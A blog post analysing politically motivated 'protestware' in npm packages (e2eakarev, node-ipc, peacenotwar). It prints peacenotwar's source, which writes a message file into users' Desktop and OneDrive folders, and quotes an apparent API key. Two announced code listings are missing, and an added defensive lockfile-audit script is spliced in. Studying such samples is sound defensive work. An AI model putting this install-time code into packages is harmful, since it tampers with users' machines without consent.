The Uprising of Dissentware Amidst Times of Conflict


Within the ever-changing realm of cybersecurity challenges, an unsettling trend has surfaced, defying the traditional norms of harmful software. Introducing “dissentware” — a term that instills fear in cybersecurity professionals and individuals alike. Unlike conventional malware, dissentware isn’t crafted solely to exploit weaknesses or pilfer confidential data. Instead, it capitalizes on its malicious nature to promote a specific ideological or political stance, ensnaring victims in the midst of virtual activism.

Illustration of Dissentware

One of the latest and most intriguing dissentware instances comes from npm, the JavaScript package manager. Specifically, the package named e2eakarev is a straightforward yet notable example of this emerging genre of unwanted malicious software. When an unsuspecting user installs the package through npm install, its package.json orchestrates the installation process as follows:


The file index.js is executed as a post-installation step. It contains the following code:

Essentially, it queries ipgeolocation.io (using the API key fa845b4108e34abe981624d400f18a5d) to check whether the installation is taking place in Israel. If the originating IP address matches the Israeli IP-code database, it prints “PROTEST_MESSAGE” directly to the console. The printed message can be found within the code for further reading.

Dissentware Diversification

While e2eakarev was a non-destructive piece of malware, numerous other dissentware instances function as wipers (refer to this GitHub repo). For instance, node-ipc carries an intriguing piece of dissentware that erases victims’ files. When the host’s IP address is located in Russia or Belarus, all of its files are overwritten with a heart emoji. A 25% probability is set manually so that the wipe looks like a random bug rather than an intentional action. This affects the package node-ipc from version 10.1.1 up to version 10.1.3. From version 11.0.0 onwards, the malicious code is not directly embedded in the package source.

Nevertheless, creations like peacenotwar stand out for their messages and their capability to propagate across external drives or even network drives like OneDrive.

import fs from 'fs';
import find from './service/findFiles.js';
import read from './service/readFile.js';
import { homedir } from 'os';


var Desktops = `${homedir}/Desktop/`;
var OneDrive = `${homedir}/OneDrive/`;
var OneDriveDesktops = `${homedir}/OneDrive/Desktop/`;

var DesktopFileExists=find(Desktops,'WITH-LOVE-FROM-AMERICA.txt');
var OneDriveDesktopFileExists=find(OneDriveDesktops,'WITH-LOVE-FROM-AMERICA.txt');
var OneDriveFileExists=find(OneDrive,'WITH-LOVE-FROM-AMERICA.txt');


function deliverAPeacefulMessage(path,message){
    try{
        fs.writeFile(
            path, 
            message,
            function(err){
                //its all good
            }
        );
    }catch(err){
        //thats ok
    }
}

//let's be polite and only do this once.
//hopefully once is all it takes.
if(!DesktopFileExists?.length&&!OneDriveFileExists?.length&&!OneDriveDesktopFileExists?.length){
    var thinkaboutit='WITH-LOVE-FROM-AMERICA.txt';

    var WITH_LOVE_FROM_AMERICA=read(`./${thinkaboutit}`);

    deliverAPeacefulMessage(`${Desktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
    deliverAPeacefulMessage(`${OneDriveDesktops}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
    deliverAPeacefulMessage(`${OneDrive}${thinkaboutit}`,WITH_LOVE_FROM_AMERICA);
}

var whatWeWant='♥';

export {
    whatWeWant as default,
    whatWeWant
}

This module places a peaceful message on users’ desktops and, as a courtesy, does so only if the file does not already exist. Vulnerable versions of this package may exhibit unwanted behavior, generating files on users’ desktops and in OneDrive.
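For defenders, the install-time execution and the affected packages described above can be checked from a project's lockfile. The following is an added example, not code from the original post or from any of the packages discussed: it audits a parsed package-lock.json (lockfileVersion 2 or 3) for the packages and versions this article names and for any other dependency that declares an install script. The sample lockfile, its package names other than those in the article, and all function names are constructed for illustration.

```javascript
// Added example: audit a parsed package-lock.json for packages named in the
// article and for dependencies that run code at install time.

// Packages and versions taken from the article text (assumption: exact match).
const FLAGGED = new Map([
  ['e2eakarev', () => true],
  ['peacenotwar', () => true],
  ['node-ipc', (v) => ['10.1.1', '10.1.2', '10.1.3'].includes(v)],
]);

// "node_modules/a/node_modules/@scope/b" -> "@scope/b"
function packageName(lockPath) {
  const marker = 'node_modules/';
  const idx = lockPath.lastIndexOf(marker);
  return idx === -1 ? lockPath : lockPath.slice(idx + marker.length);
}

function auditLockfile(lock) {
  const findings = [];
  for (const [path, meta] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // root project entry, not a dependency
    const name = meta.name || packageName(path);
    const version = meta.version;
    const check = FLAGGED.get(name);
    if (check && check(version)) {
      findings.push({ name, version, path, reason: 'named-in-article' });
    } else if (meta.hasInstallScript) {
      // npm sets this flag for packages with preinstall/install/postinstall
      findings.push({ name, version, path, reason: 'install-script' });
    }
  }
  return findings;
}

// Constructed sample lockfile (not real project data).
const SAMPLE_LOCK = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'demo-app', version: '1.0.0' },
    'node_modules/node-ipc': { version: '10.1.2' },
    'node_modules/some-tool/node_modules/node-ipc': { version: '9.1.0' },
    'node_modules/peacenotwar': { version: '1.0.0' },
    'node_modules/native-addon': { version: '2.0.0', hasInstallScript: true },
    'node_modules/plain-lib': { version: '1.3.0' },
  },
};

console.log(auditLockfile(SAMPLE_LOCK));
```

To audit a real project, pass the parsed contents of its package-lock.json in place of SAMPLE_LOCK; installing with npm's --ignore-scripts option prevents the flagged install scripts from running during review.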

Concluding Remarks

As we wrap up our examination of dissentware in 2023, it becomes evident that the landscape of cyber threats is growing more complex and nuanced. The emergence of this unique form of malicious software underscores the dynamic challenges in cybersecurity, surpassing conventional motives of financial incentives or data theft.

The intertwined relationship between technology and activism has forged a new frontier where virtual protests materialize in the guise of code, infiltrating systems with the objective of causing disruption and spreading discord. Although the motives behind dissentware may stem from ideological or political beliefs, the repercussions extend far beyond the digital domain.

As individuals and organizations confront the evolving threat landscape, it’s imperative to adapt strategies and reinforce defenses against this emerging peril. Cybersecurity protocols must evolve to encompass not just the typical concerns of data security and system integrity, but also the socio-political dimensions introduced by dissentware.

In the ongoing battle against dissentware, knowledge remains our strongest tool. By remaining informed and proactive, we can collectively construct a resilient defense against this unique strain of cyber threat, ensuring a safer and more secure digital future for all.

DISCLAIMER: I utilized artificial intelligence to accurately modify and restructure sections of this blog post.
